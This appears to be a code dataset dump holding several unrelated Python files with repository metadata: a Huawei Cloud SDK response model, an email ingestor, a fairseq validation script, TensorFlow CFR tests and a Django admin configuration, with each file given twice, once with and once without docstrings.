if __name__ == '__main__':
    main()
| true | true |
f7fa5b17bcc2bc7d454ac4089c0cb6c4f4eac213 | 3,205 | py | Python | huaweicloud-sdk-vpc/huaweicloudsdkvpc/v2/model/create_privateip_response.py | huaweicloud/huaweicloud-sdk-python-v3 | 7a6270390fcbf192b3882bf763e7016e6026ef78 | [
"Apache-2.0"
] | 64 | 2020-06-12T07:05:07.000Z | 2022-03-30T03:32:50.000Z | huaweicloud-sdk-vpc/huaweicloudsdkvpc/v2/model/create_privateip_response.py | huaweicloud/huaweicloud-sdk-python-v3 | 7a6270390fcbf192b3882bf763e7016e6026ef78 | [
"Apache-2.0"
] | 11 | 2020-07-06T07:56:54.000Z | 2022-01-11T11:14:40.000Z | huaweicloud-sdk-vpc/huaweicloudsdkvpc/v2/model/create_privateip_response.py | huaweicloud/huaweicloud-sdk-python-v3 | 7a6270390fcbf192b3882bf763e7016e6026ef78 | [
"Apache-2.0"
] | 24 | 2020-06-08T11:42:13.000Z | 2022-03-04T06:44:08.000Z | # coding: utf-8
import re
import six
from huaweicloudsdkcore.sdk_response import SdkResponse
from huaweicloudsdkcore.utils.http_utils import sanitize_for_serialization
class CreatePrivateipResponse(SdkResponse):
    """Response model for the VPC "create private IP" API.

    Generated-SDK style model: ``openapi_types`` and ``attribute_map``
    drive the generic serialization in :meth:`to_dict`.
    """

    sensitive_list = []

    openapi_types = {
        'privateips': 'list[Privateip]'
    }

    attribute_map = {
        'privateips': 'privateips'
    }

    def __init__(self, privateips=None):
        """Build the response; *privateips* is a list of Privateip models."""
        super(CreatePrivateipResponse, self).__init__()
        self._privateips = None
        self.discriminator = None
        if privateips is not None:
            self.privateips = privateips

    @property
    def privateips(self):
        """list[Privateip]: the private IPs created by the request."""
        return self._privateips

    @privateips.setter
    def privateips(self, privateips):
        """Set the list of created private IPs."""
        self._privateips = privateips

    def to_dict(self):
        """Recursively serialize the model to a plain dict.

        Attributes listed in ``sensitive_list`` are masked as ``"****"``.
        """
        result = {}
        for name in self.openapi_types:
            value = getattr(self, name)
            if isinstance(value, list):
                result[name] = [
                    item.to_dict() if hasattr(item, "to_dict") else item
                    for item in value
                ]
            elif hasattr(value, "to_dict"):
                result[name] = value.to_dict()
            elif isinstance(value, dict):
                result[name] = {
                    key: val.to_dict() if hasattr(val, "to_dict") else val
                    for key, val in value.items()
                }
            elif name in self.sensitive_list:
                result[name] = "****"
            else:
                result[name] = value
        return result

    def to_str(self):
        """Return the JSON string representation of the model."""
        import simplejson as json
        if six.PY2:
            import sys
            reload(sys)
            sys.setdefaultencoding("utf-8")
        return json.dumps(sanitize_for_serialization(self), ensure_ascii=False)

    def __repr__(self):
        """For `print`."""
        return self.to_str()

    def __eq__(self, other):
        """Equal when *other* is the same model type with equal attributes."""
        if not isinstance(other, CreatePrivateipResponse):
            return False
        return self.__dict__ == other.__dict__

    def __ne__(self, other):
        """Inverse of :meth:`__eq__`."""
        return not self == other
| 27.869565 | 79 | 0.570047 |
import re
import six
from huaweicloudsdkcore.sdk_response import SdkResponse
from huaweicloudsdkcore.utils.http_utils import sanitize_for_serialization
class CreatePrivateipResponse(SdkResponse):
    """Response model for the VPC "create private IP" API (generated SDK)."""
    sensitive_list = []
    openapi_types = {
        'privateips': 'list[Privateip]'
    }
    attribute_map = {
        'privateips': 'privateips'
    }
    def __init__(self, privateips=None):
        """Build the response; *privateips* is a list of Privateip models."""
        super(CreatePrivateipResponse, self).__init__()
        self._privateips = None
        self.discriminator = None
        if privateips is not None:
            self.privateips = privateips
    @property
    def privateips(self):
        """list[Privateip]: the private IPs created by the request."""
        return self._privateips
    @privateips.setter
    def privateips(self, privateips):
        """Set the list of created private IPs."""
        self._privateips = privateips
    def to_dict(self):
        """Recursively serialize the model to a plain dict, masking any
        attribute named in ``sensitive_list`` as ``"****"``."""
        result = {}
        for attr, _ in six.iteritems(self.openapi_types):
            value = getattr(self, attr)
            if isinstance(value, list):
                result[attr] = list(map(
                    lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
                    value
                ))
            elif hasattr(value, "to_dict"):
                result[attr] = value.to_dict()
            elif isinstance(value, dict):
                result[attr] = dict(map(
                    lambda item: (item[0], item[1].to_dict())
                    if hasattr(item[1], "to_dict") else item,
                    value.items()
                ))
            else:
                if attr in self.sensitive_list:
                    result[attr] = "****"
                else:
                    result[attr] = value
        return result
    def to_str(self):
        """Return the JSON string representation of the model."""
        import simplejson as json
        if six.PY2:
            import sys
            reload(sys)
            sys.setdefaultencoding("utf-8")
        return json.dumps(sanitize_for_serialization(self), ensure_ascii=False)
    def __repr__(self):
        """For `print`."""
        return self.to_str()
    def __eq__(self, other):
        """Equal when *other* is the same model type with equal attributes."""
        if not isinstance(other, CreatePrivateipResponse):
            return False
        return self.__dict__ == other.__dict__
    def __ne__(self, other):
        """Inverse of :meth:`__eq__`."""
        return not self == other
| true | true |
f7fa5b44230f67e825a60b537683511b06137f6a | 2,330 | py | Python | ingestors/email/msg.py | simonwoerpel/ingest-file | 1ff68be0abb92e50bf726a1c8c1f8ff12d8b2fc0 | [
"MIT"
] | 23 | 2017-05-25T01:08:58.000Z | 2019-06-22T19:35:50.000Z | ingestors/email/msg.py | simonwoerpel/ingest-file | 1ff68be0abb92e50bf726a1c8c1f8ff12d8b2fc0 | [
"MIT"
] | 153 | 2020-10-07T13:42:08.000Z | 2022-03-18T08:11:37.000Z | ingestors/email/msg.py | simonwoerpel/ingest-file | 1ff68be0abb92e50bf726a1c8c1f8ff12d8b2fc0 | [
"MIT"
] | 9 | 2020-10-22T08:54:20.000Z | 2022-02-01T10:23:22.000Z | import email
import logging
from email.policy import default
from email.errors import MessageError
from pantomime import normalize_mimetype
from followthemoney import model
from ingestors.ingestor import Ingestor
from ingestors.support.email import EmailSupport
from ingestors.support.encoding import EncodingSupport
from ingestors.exc import ProcessingException
log = logging.getLogger(__name__)
class RFC822Ingestor(Ingestor, EmailSupport, EncodingSupport):
    """Ingest RFC 822 email messages (.eml and similar) into Email entities."""

    MIME_TYPES = ["multipart/mixed", "message/rfc822"]
    BODY_HTML = "text/html"
    BODY_PLAIN = "text/plain"
    BODY_TYPES = [BODY_HTML, BODY_PLAIN]
    EXTENSIONS = ["eml", "rfc822", "email", "msg"]
    SCORE = 7

    def decode_part(self, part):
        """Decode a MIME part's payload to text using its declared charset."""
        raw = part.get_payload(decode=True)
        return self.decode_string(raw, part.get_content_charset())

    def parse_part(self, entity, part):
        """Dispatch one (non-container) MIME part.

        Parts with a filename, an explicit attachment disposition, or a
        non-body MIME type become attachments; HTML and plain-text parts
        feed the entity's body fields.
        """
        if part.is_multipart():
            # Container parts carry no payload of their own; msg.walk()
            # visits their children separately.
            return
        mime_type = normalize_mimetype(part.get_content_type())
        file_name = part.get_filename()
        treat_as_attachment = (
            part.is_attachment()
            or file_name is not None
            or mime_type not in self.BODY_TYPES
        )
        if treat_as_attachment:
            self.ingest_attachment(
                entity, file_name, mime_type, part.get_payload(decode=True))
        elif self.BODY_HTML in mime_type:
            self.extract_html_content(
                entity, self.decode_part(part), extract_metadata=False)
        elif self.BODY_PLAIN in mime_type:
            entity.add("bodyText", self.decode_part(part))
        else:
            log.error("Dangling MIME fragment: %s", part)

    def ingest_msg(self, entity, msg):
        """Extract headers, then dispatch every MIME part of *msg*."""
        self.extract_msg_headers(entity, msg)
        self.resolve_message_ids(entity)
        for part in msg.walk():
            self.parse_part(entity, part)

    def ingest(self, file_path, entity):
        """Parse *file_path* as an email and populate *entity*.

        Raises ProcessingException when the file cannot be parsed.
        """
        entity.schema = model.get("Email")
        try:
            with open(file_path, "rb") as fh:
                msg = email.message_from_binary_file(fh, policy=default)
        except (MessageError, ValueError, IndexError) as err:
            raise ProcessingException("Cannot parse email: %s" % err) from err
        self.ingest_msg(entity, msg)
| 36.40625 | 78 | 0.68412 | import email
import logging
from email.policy import default
from email.errors import MessageError
from pantomime import normalize_mimetype
from followthemoney import model
from ingestors.ingestor import Ingestor
from ingestors.support.email import EmailSupport
from ingestors.support.encoding import EncodingSupport
from ingestors.exc import ProcessingException
log = logging.getLogger(__name__)
class RFC822Ingestor(Ingestor, EmailSupport, EncodingSupport):
    """Ingest RFC 822 / .eml email files into followthemoney Email entities."""
    MIME_TYPES = ["multipart/mixed", "message/rfc822"]
    BODY_HTML = "text/html"
    BODY_PLAIN = "text/plain"
    BODY_TYPES = [BODY_HTML, BODY_PLAIN]
    EXTENSIONS = ["eml", "rfc822", "email", "msg"]
    SCORE = 7
    def decode_part(self, part):
        """Decode a MIME part's payload using its declared charset."""
        charset = part.get_content_charset()
        payload = part.get_payload(decode=True)
        return self.decode_string(payload, charset)
    def parse_part(self, entity, part):
        """Treat a leaf MIME part as attachment or as HTML/plain body text."""
        if part.is_multipart():
            # Containers are skipped; msg.walk() visits their children.
            return
        mime_type = normalize_mimetype(part.get_content_type())
        file_name = part.get_filename()
        is_attachment = part.is_attachment()
        is_attachment = is_attachment or file_name is not None
        is_attachment = is_attachment or mime_type not in self.BODY_TYPES
        if is_attachment:
            payload = part.get_payload(decode=True)
            self.ingest_attachment(entity, file_name, mime_type, payload)
        elif self.BODY_HTML in mime_type:
            payload = self.decode_part(part)
            self.extract_html_content(entity, payload, extract_metadata=False)
        elif self.BODY_PLAIN in mime_type:
            entity.add("bodyText", self.decode_part(part))
        else:
            log.error("Dangling MIME fragment: %s", part)
    def ingest_msg(self, entity, msg):
        """Extract headers, then dispatch every MIME part of *msg*."""
        self.extract_msg_headers(entity, msg)
        self.resolve_message_ids(entity)
        for part in msg.walk():
            self.parse_part(entity, part)
    def ingest(self, file_path, entity):
        """Parse *file_path* as an email; ProcessingException on failure."""
        entity.schema = model.get("Email")
        try:
            with open(file_path, "rb") as fh:
                msg = email.message_from_binary_file(fh, policy=default)
        except (MessageError, ValueError, IndexError) as err:
            raise ProcessingException("Cannot parse email: %s" % err) from err
        self.ingest_msg(entity, msg)
| true | true |
f7fa5b4de84cf3770e571b0a5aafd8c69e34588c | 3,268 | py | Python | validate.py | ggzhang0071/Self-Supervised-Embedding-Fusion-Transformer | 91ad5276bf9a796b93a9f8f2200ce75747725fed | [
"MIT"
] | 45 | 2020-09-30T23:09:40.000Z | 2022-03-01T08:31:56.000Z | validate.py | ggzhang0071/Self-Supervised-Embedding-Fusion-Transformer | 91ad5276bf9a796b93a9f8f2200ce75747725fed | [
"MIT"
] | 8 | 2020-11-05T04:44:21.000Z | 2021-12-20T03:26:59.000Z | validate.py | ggzhang0071/Self-Supervised-Embedding-Fusion-Transformer | 91ad5276bf9a796b93a9f8f2200ce75747725fed | [
"MIT"
] | 10 | 2020-10-04T17:25:27.000Z | 2021-12-23T02:40:28.000Z | #!/usr/bin/env python3 -u
# Copyright (c) 2017-present, Facebook, Inc.
# All rights reserved.
#
# This source code is licensed under the license found in the LICENSE file in
# the root directory of this source tree. An additional grant of patent rights
# can be found in the PATENTS file in the same directory.
import torch
from fairseq import checkpoint_utils, options, progress_bar, utils
def main(args, override_args=None):
    """Validate a trained fairseq model on the configured validation subsets.

    Args:
        args: parsed fairseq validation arguments (checkpoint path, data
            and batching options).
        override_args: optional namespace of explicitly-given CLI options
            whose values override those stored in the checkpoint.
    """
    utils.import_user_module(args)
    use_fp16 = args.fp16
    use_cuda = torch.cuda.is_available() and not args.cpu
    if override_args is not None:
        overrides = vars(override_args)
        # NOTE(review): eval() on the user-supplied --model-overrides string;
        # trusted CLI input is assumed here.
        overrides.update(eval(getattr(override_args, 'model_overrides', '{}')))
    else:
        overrides = None
    # Load ensemble
    print('| loading model(s) from {}'.format(args.path))
    models, model_args, task = checkpoint_utils.load_model_ensemble_and_task(
        [args.path],
        arg_overrides=overrides,
    )
    model = models[0]
    # Move models to GPU
    # NOTE(review): the loop below rebinds `model`; after it, `model` refers
    # to the *last* ensemble member, which is what valid_step receives.
    for model in models:
        if use_fp16:
            model.half()
        if use_cuda:
            model.cuda()
    # Print args
    print(model_args)
    # Build criterion
    criterion = task.build_criterion(model_args)
    criterion.eval()
    # Load valid dataset (we load training data below, based on the latest checkpoint)
    for subset in args.valid_subset.split(','):
        try:
            task.load_dataset(subset, combine=False, epoch=0)
            dataset = task.dataset(subset)
        except KeyError:
            raise Exception('Cannot find dataset: ' + subset)
        # Initialize data iterator
        itr = task.get_batch_iterator(
            dataset=dataset,
            max_tokens=args.max_tokens,
            max_sentences=args.max_sentences,
            max_positions=utils.resolve_max_positions(
                task.max_positions(),
                *[m.max_positions() for m in models],
            ),
            ignore_invalid_inputs=args.skip_invalid_size_inputs_valid_test,
            required_batch_size_multiple=args.required_batch_size_multiple,
            seed=args.seed,
            num_workers=args.num_workers,
        ).next_epoch_itr(shuffle=False)
        progress = progress_bar.build_progress_bar(
            args, itr,
            prefix='valid on \'{}\' subset'.format(subset),
            no_progress_bar='simple'
        )
        # Accumulate per-batch logging outputs, then aggregate per subset.
        log_outputs = []
        for i, sample in enumerate(progress):
            sample = utils.move_to_cuda(sample) if use_cuda else sample
            _loss, _sample_size, log_output = task.valid_step(sample, model, criterion)
            progress.log(log_output, step=i)
            log_outputs.append(log_output)
        log_output = task.aggregate_logging_outputs(log_outputs, criterion)
        progress.print(log_output, tag=subset, step=i)
def cli_main():
    """Parse the validation command line and dispatch to :func:`main`."""
    parser = options.get_validation_parser()
    args = options.parse_args_and_arch(parser)
    # only override args that are explicitly given on the command line
    override_parser = options.get_validation_parser()
    override_args = options.parse_args_and_arch(override_parser, suppress_defaults=True)
    main(args, override_args)
if __name__ == '__main__':
    cli_main()
| 30.830189 | 88 | 0.655141 |
import torch
from fairseq import checkpoint_utils, options, progress_bar, utils
def main(args, override_args=None):
    """Validate a fairseq checkpoint on the configured validation subsets."""
    utils.import_user_module(args)
    use_fp16 = args.fp16
    use_cuda = torch.cuda.is_available() and not args.cpu
    if override_args is not None:
        overrides = vars(override_args)
        # NOTE(review): eval() on the --model-overrides string; trusted CLI
        # input is assumed.
        overrides.update(eval(getattr(override_args, 'model_overrides', '{}')))
    else:
        overrides = None
    print('| loading model(s) from {}'.format(args.path))
    models, model_args, task = checkpoint_utils.load_model_ensemble_and_task(
        [args.path],
        arg_overrides=overrides,
    )
    model = models[0]
    # The loop rebinds `model`; valid_step below receives the last member.
    for model in models:
        if use_fp16:
            model.half()
        if use_cuda:
            model.cuda()
    print(model_args)
    criterion = task.build_criterion(model_args)
    criterion.eval()
    for subset in args.valid_subset.split(','):
        try:
            task.load_dataset(subset, combine=False, epoch=0)
            dataset = task.dataset(subset)
        except KeyError:
            raise Exception('Cannot find dataset: ' + subset)
        itr = task.get_batch_iterator(
            dataset=dataset,
            max_tokens=args.max_tokens,
            max_sentences=args.max_sentences,
            max_positions=utils.resolve_max_positions(
                task.max_positions(),
                *[m.max_positions() for m in models],
            ),
            ignore_invalid_inputs=args.skip_invalid_size_inputs_valid_test,
            required_batch_size_multiple=args.required_batch_size_multiple,
            seed=args.seed,
            num_workers=args.num_workers,
        ).next_epoch_itr(shuffle=False)
        progress = progress_bar.build_progress_bar(
            args, itr,
            prefix='valid on \'{}\' subset'.format(subset),
            no_progress_bar='simple'
        )
        log_outputs = []
        for i, sample in enumerate(progress):
            sample = utils.move_to_cuda(sample) if use_cuda else sample
            _loss, _sample_size, log_output = task.valid_step(sample, model, criterion)
            progress.log(log_output, step=i)
            log_outputs.append(log_output)
        log_output = task.aggregate_logging_outputs(log_outputs, criterion)
        progress.print(log_output, tag=subset, step=i)
def cli_main():
    """Parse validation CLI args (plus explicit overrides) and run main()."""
    parser = options.get_validation_parser()
    args = options.parse_args_and_arch(parser)
    # A second parse with suppress_defaults=True keeps only options the user
    # explicitly passed; these override checkpoint-stored values.
    override_parser = options.get_validation_parser()
    override_args = options.parse_args_and_arch(override_parser, suppress_defaults=True)
    main(args, override_args)
if __name__ == '__main__':
    cli_main()
| true | true |
f7fa5ba72903d65c6cf4f6c5af2e049b382a1af6 | 818 | py | Python | webapp/roasterui/urls.py | markturansky/coffeeroaster | 238217ce4abbd2f18383ba4811f4cca14ee0fb8f | [
"MIT"
] | null | null | null | webapp/roasterui/urls.py | markturansky/coffeeroaster | 238217ce4abbd2f18383ba4811f4cca14ee0fb8f | [
"MIT"
] | null | null | null | webapp/roasterui/urls.py | markturansky/coffeeroaster | 238217ce4abbd2f18383ba4811f4cca14ee0fb8f | [
"MIT"
] | null | null | null | """webapp URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.11/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.conf.urls import url, include
2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))
"""
from django.conf.urls import url, include
from django.contrib import admin
# URL routing for the roasterui project: admin site plus the roasts app.
urlpatterns = [
    url(r'^admin/', admin.site.urls),
    url(r'^roasts/', include('roasts.urls')),
]
| 35.565217 | 79 | 0.698044 | from django.conf.urls import url, include
from django.contrib import admin
# URL routing for the roasterui project: admin site plus the roasts app.
urlpatterns = [
    url(r'^admin/', admin.site.urls),
    url(r'^roasts/', include('roasts.urls')),
]
| true | true |
f7fa5d25c543d762ee653ca2780563f3feaa3132 | 2,248 | py | Python | research2018/test/tabular_cfr_test.py | dmorrill10/research2018 | 3604e3fb774f6d882e41cc217ceb85038d3775e5 | [
"MIT"
] | null | null | null | research2018/test/tabular_cfr_test.py | dmorrill10/research2018 | 3604e3fb774f6d882e41cc217ceb85038d3775e5 | [
"MIT"
] | null | null | null | research2018/test/tabular_cfr_test.py | dmorrill10/research2018 | 3604e3fb774f6d882e41cc217ceb85038d3775e5 | [
"MIT"
] | null | null | null | import tensorflow as tf
tf.compat.v1.enable_eager_execution()
from research2018.tabular_cfr import TabularCfr, TabularCfrCurrent
class TabularCfrTest(tf.test.TestCase):
    """Unit tests for TabularCfr / TabularCfrCurrent.

    The exact numeric constants below depend on the RNG seed fixed in
    setUp (42) and on the order of the random ops in each test — do not
    reorder the tf.random calls.
    """
    def setUp(self):
        # Fix the global TF seed so tf.random.normal draws are reproducible.
        tf.random.set_seed(42)
    def test_zeros(self):
        """zeros() starts with uniform current, average and overall policies."""
        num_info_sets = 2
        num_actions = 3
        patient = TabularCfr.zeros(num_info_sets, num_actions)
        self.assertAllClose(
            tf.fill([num_info_sets, num_actions], 1.0 / num_actions),
            patient.cur())
        self.assertAllClose(
            tf.fill([num_info_sets, num_actions], 1.0 / num_actions),
            patient.avg())
        self.assertAllClose(
            tf.fill([num_info_sets, num_actions], 1.0 / num_actions),
            patient.policy())
    def test_update(self):
        """update() advances cur immediately; avg/policy lag one step behind."""
        num_info_sets = 2
        num_actions = 3
        patient = TabularCfr(
            TabularCfrCurrent(
                tf.random.normal(shape=[num_info_sets, num_actions])),
            tf.zeros([num_info_sets, num_actions]))
        initial_cur = tf.constant([[0.50621, 0., 0.49379],
                                   [0.333333, 0.333333, 0.333333]])
        self.assertAllClose(initial_cur, patient.cur())
        self.assertAllClose(
            tf.fill([num_info_sets, num_actions], 1.0 / num_actions),
            patient.avg())
        self.assertAllClose(
            tf.fill([num_info_sets, num_actions], 1.0 / num_actions),
            patient.policy())
        # Fake environment: random values weighted by the current policy.
        def env(policy):
            return tf.random.normal(
                shape=[num_info_sets, num_actions]) * policy
        patient.update(env)
        next_cur = tf.constant([[0.39514, 0., 0.60486],
                                [0.333333, 0.333333, 0.333333]])
        self.assertAllClose(next_cur, patient.cur())
        self.assertAllClose(initial_cur, patient.avg())
        self.assertAllClose(initial_cur, patient.policy())
        patient.update(env)
        next_next_cur = [[0., 0., 1.], [0.333333, 0.333333, 0.333333]]
        self.assertAllClose(next_next_cur, patient.cur())
        self.assertAllClose((initial_cur + next_cur) / 2.0, patient.avg())
        self.assertAllClose((initial_cur + next_cur) / 2.0, patient.policy())
if __name__ == '__main__':
    tf.test.main()
| 35.125 | 77 | 0.598754 | import tensorflow as tf
tf.compat.v1.enable_eager_execution()
from research2018.tabular_cfr import TabularCfr, TabularCfrCurrent
class TabularCfrTest(tf.test.TestCase):
    """Unit tests for TabularCfr / TabularCfrCurrent.

    The numeric constants depend on the RNG seed fixed in setUp (42) and on
    the order of the random ops in each test.
    """
    def setUp(self):
        # Fix the global TF seed so tf.random.normal draws are reproducible.
        tf.random.set_seed(42)
    def test_zeros(self):
        """zeros() starts with uniform current, average and overall policies."""
        num_info_sets = 2
        num_actions = 3
        patient = TabularCfr.zeros(num_info_sets, num_actions)
        self.assertAllClose(
            tf.fill([num_info_sets, num_actions], 1.0 / num_actions),
            patient.cur())
        self.assertAllClose(
            tf.fill([num_info_sets, num_actions], 1.0 / num_actions),
            patient.avg())
        self.assertAllClose(
            tf.fill([num_info_sets, num_actions], 1.0 / num_actions),
            patient.policy())
    def test_update(self):
        """update() advances cur immediately; avg/policy lag one step behind."""
        num_info_sets = 2
        num_actions = 3
        patient = TabularCfr(
            TabularCfrCurrent(
                tf.random.normal(shape=[num_info_sets, num_actions])),
            tf.zeros([num_info_sets, num_actions]))
        initial_cur = tf.constant([[0.50621, 0., 0.49379],
                                   [0.333333, 0.333333, 0.333333]])
        self.assertAllClose(initial_cur, patient.cur())
        self.assertAllClose(
            tf.fill([num_info_sets, num_actions], 1.0 / num_actions),
            patient.avg())
        self.assertAllClose(
            tf.fill([num_info_sets, num_actions], 1.0 / num_actions),
            patient.policy())
        # Fake environment: random values weighted by the current policy.
        def env(policy):
            return tf.random.normal(
                shape=[num_info_sets, num_actions]) * policy
        patient.update(env)
        next_cur = tf.constant([[0.39514, 0., 0.60486],
                                [0.333333, 0.333333, 0.333333]])
        self.assertAllClose(next_cur, patient.cur())
        self.assertAllClose(initial_cur, patient.avg())
        self.assertAllClose(initial_cur, patient.policy())
        patient.update(env)
        next_next_cur = [[0., 0., 1.], [0.333333, 0.333333, 0.333333]]
        self.assertAllClose(next_next_cur, patient.cur())
        self.assertAllClose((initial_cur + next_cur) / 2.0, patient.avg())
        self.assertAllClose((initial_cur + next_cur) / 2.0, patient.policy())
if __name__ == '__main__':
    tf.test.main()
| true | true |
f7fa5d46732df96a84ddbc17c5a4b4cd7b4ec96a | 1,160 | py | Python | catalog/admin.py | kainar1823/django_local_library | 92ad9d4d008fad4ff11c016d0747d618059c3144 | [
"Unlicense"
] | null | null | null | catalog/admin.py | kainar1823/django_local_library | 92ad9d4d008fad4ff11c016d0747d618059c3144 | [
"Unlicense"
] | null | null | null | catalog/admin.py | kainar1823/django_local_library | 92ad9d4d008fad4ff11c016d0747d618059c3144 | [
"Unlicense"
] | null | null | null | from django.contrib import admin
from .models import Author, Genre, Book, BookInstance
# admin.site.register(Genre)
# admin.site.register(Author)
# admin.site.register(Book)
# admin.site.register(BookInstance)
@admin.register(Genre)
class GenreAdmin(admin.ModelAdmin):
    """Genre admin with default options."""
    pass
@admin.register(Author)
class AuthorAdmin(admin.ModelAdmin):
    """Author admin: name/date columns; birth and death dates paired on the form."""
    list_display = ('last_name', 'first_name',
                    'date_of_birth', 'date_of_death')
    fields = ['first_name', 'last_name', ('date_of_birth', 'date_of_death')]
class BooksInstanceInline(admin.TabularInline):
    """Tabular inline of BookInstance copies, embedded in BookAdmin below."""
    model = BookInstance
@admin.register(Book)
class BookAdmin(admin.ModelAdmin):
    """Book admin: list columns plus inline editing of its copies."""
    list_display = ('title', 'author', 'display_genre')
    inlines = [BooksInstanceInline]
@admin.register(BookInstance)
class BookInstanceAdmin(admin.ModelAdmin):
    """Admin configuration for individual book copies.

    BUG FIX: this class was previously named ``BookInstance``, shadowing the
    imported ``BookInstance`` model in the module namespace once the class
    statement executed. Renamed to ``BookInstanceAdmin`` (the conventional
    name) so ``BookInstance`` keeps referring to the model. The
    ``@admin.register`` argument is evaluated before the class binds, so
    registration behavior is unchanged.
    """
    list_filter = ('status', 'due_back')
    list_display = ('book', 'status', 'borrower',
                    'due_back', 'is_overdue', 'id')
    fieldsets = (
        (None, {
            'fields': ('book', 'imprint', 'id')
        }),
        ('Availability', {
            'fields': ('status', 'due_back', 'borrower')
        }),
    )
| 24.680851 | 76 | 0.643966 | from django.contrib import admin
from .models import Author, Genre, Book, BookInstance
@admin.register(Genre)
class GenreAdmin(admin.ModelAdmin):
    """Genre admin with default options."""
    pass
@admin.register(Author)
class AuthorAdmin(admin.ModelAdmin):
    """Author admin: name/date columns; dates paired on the edit form."""
    list_display = ('last_name', 'first_name',
                    'date_of_birth', 'date_of_death')
    fields = ['first_name', 'last_name', ('date_of_birth', 'date_of_death')]
class BooksInstanceInline(admin.TabularInline):
    """Tabular inline of BookInstance copies, embedded in BookAdmin below."""
    model = BookInstance
@admin.register(Book)
class BookAdmin(admin.ModelAdmin):
    """Book admin: list columns plus inline editing of its copies."""
    list_display = ('title', 'author', 'display_genre')
    inlines = [BooksInstanceInline]
@admin.register(BookInstance)
class BookInstanceAdmin(admin.ModelAdmin):
    """Admin configuration for individual book copies.

    BUG FIX: this class was previously named ``BookInstance``, shadowing the
    imported ``BookInstance`` model in the module namespace once the class
    statement executed. Renamed to ``BookInstanceAdmin`` so ``BookInstance``
    keeps referring to the model; the ``@admin.register`` argument is
    evaluated before the class binds, so registration is unchanged.
    """
    list_filter = ('status', 'due_back')
    list_display = ('book', 'status', 'borrower',
                    'due_back', 'is_overdue', 'id')
    fieldsets = (
        (None, {
            'fields': ('book', 'imprint', 'id')
        }),
        ('Availability', {
            'fields': ('status', 'due_back', 'borrower')
        }),
    )
| true | true |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.